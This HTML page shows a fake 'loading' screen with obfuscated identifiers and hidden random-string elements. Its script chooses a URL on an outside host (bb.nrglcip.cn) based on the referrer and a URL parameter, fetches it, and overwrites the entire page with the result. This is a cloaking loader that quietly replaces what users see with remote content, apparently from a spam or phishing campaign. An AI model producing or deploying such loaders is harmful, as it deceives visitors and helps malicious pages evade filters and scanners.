<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .NkD8fU {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .NkD8fU .BTsx5Xemeyw {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .NkD8fU .content {
            line-height: 50px;
            text-align: center
        }

        .NkD8fU .img {
            width: 100%
        }

        .NkD8fU .RIXiiWl5e {
            text-align: center
        }

        .NkD8fU .RIXiiWl5e span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .NkD8fU .RIXiiWl5e span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .NkD8fU .RIXiiWl5e span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .NkD8fU .RIXiiWl5e span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .NkD8fU .RIXiiWl5e span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .NkD8fU .RIXiiWl5e span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .NkD8fU .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function ZCQpLhHOxwp(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var ryO6nQl = ZCQpLhHOxwp('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ ryO6nQl +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ ryO6nQl +".html?a=share";
		}
		
        fq6SMK=url+"#"+new Date().getTime();
        fq6SMK && function() {
            $.get(fq6SMK, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<span style='display:none'>ArCMukFNLYqtdzFHtBrzs6jspSQ7jziJ</span>
<h1 style='display:none' >LhXnqKEQlE8YRBMTQTXJ4OthEWS0AcTfQnKx4fTLQtZZiDEwQg6BRsvzERvdyjTKTm</h1>
<div style='display:none'>fOwCBg3E9UvGoRBvkDMhXkOQL7QR6KVwrcUGlL56S</div>
<img  src='' style='display:none'>
<div style='display:none'>fOwCBg3E9UvGoRBvkDMhXkOQL7QR6KVwrcUGlL56S</div>
<a  href='#' style='display:none'>TR6gnR5JqhFYsGUnSs7KcCmzMaJ4xGBR5frkkH2Vb6f9pMFp6t6NVWHm8sfaj1dFhVNHDfJ3X3BIY1wFl9TtrQhoXEU4CVhW3Lv</a><div class="NkD8fU">
    <div class="BTsx5Xemeyw">
        <div class="RIXiiWl5e">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<ul style='display:none' >CXCbu9NMZgldUwmmKJMryWMskoGCQLLv</ul>
<ul style='display:none' >CXCbu9NMZgldUwmmKJMryWMskoGCQLLv</ul>
<li style='display:none' >tyHwT838B1NORhuhgPZnT021QucmWbpW5DqDg7ODayX0pR0AIyYKSVhnXeX4BM9MaEJ12</li>
<div style='display:none'>vrLxtuNjX96k2neM6QmIxQnze</div>
<ul style='display:none' >CXCbu9NMZgldUwmmKJMryWMskoGCQLLv</ul>
<li style='display:none' >tyHwT838B1NORhuhgPZnT021QucmWbpW5DqDg7ODayX0pR0AIyYKSVhnXeX4BM9MaEJ12</li>
<span style='display:none'>RohSJgiRtA7eWDb2FsJF1UXbZTW0LnBEFaXKSFDBIFT2M2Udj1ktbK9vvZg</span>
<b style='display:none' >G6y2FmEGGP7YlFD6wAWJXTlzjfelQ</b>
<p  style='display:none'>cGi3g8DCbaTd7EHnYkaZVGqF2g8umiaaqlUVnPoZlt</p></body>
</html>